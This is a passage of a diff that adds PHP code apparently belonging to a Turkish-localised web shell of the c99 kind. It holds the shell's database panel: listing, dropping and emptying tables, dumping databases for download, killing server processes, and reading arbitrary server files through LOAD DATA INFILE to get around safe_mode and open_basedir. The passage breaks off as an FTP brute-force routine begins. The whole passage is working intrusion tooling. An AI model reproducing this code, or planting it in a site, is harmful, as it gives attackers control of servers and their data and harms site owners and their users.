+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?></font><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>
+				<font face="Tahoma">Home</font></b></a><hr size="1" noshade>
+				<font face="Tahoma"><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?></font><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade><font face="Tahoma">Please, select database</font><hr size="1" noshade><input type="submit" value="Go"></form>
+				<font face="Tahoma"><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?></font><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><font face="Tahoma"><b>Create a new table:</b>
+      </font>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20"><font face="Tahoma">&nbsp;</font><input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><font face="Tahoma"><b>Dump DataBase:</b>
+      </font>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><font face="Tahoma">&nbsp;</font><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+				<font face="Tahoma"><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Indirme Hatas?! Bu dosya yazilabilir degil \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Indirildi! Yazilma basariyla tamamlandi \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Indirme: Indirilecek?</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">SIL</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#330000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>�</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
+      echo "<option value=\"\">Sec:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Bosalt</option>";
+      echo "<option value=\"tbldump\">Indir</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?></font><table border="0" width="100%" height="1"><tr><td width="30%" height="1">
+					<font face="Tahoma"><b>Create new DataBase:</b>
+            </font>
+            <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"><font face="Tahoma">&nbsp;</font><input type="submit" value="Create"></form></td><td width="30%" height="1">
+					<font face="Tahoma"><b>View File:</b></font><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"><font face="Tahoma">&nbsp;</font><input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+								<font face="Tahoma"><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#330000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#330000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#330000 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); 
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>FTP Kirici: </b><br>";
+ if (!win) {echo "Bu ozellik Wind0ws serverlarda calismaz!<br><br>";}
+ else
+ {
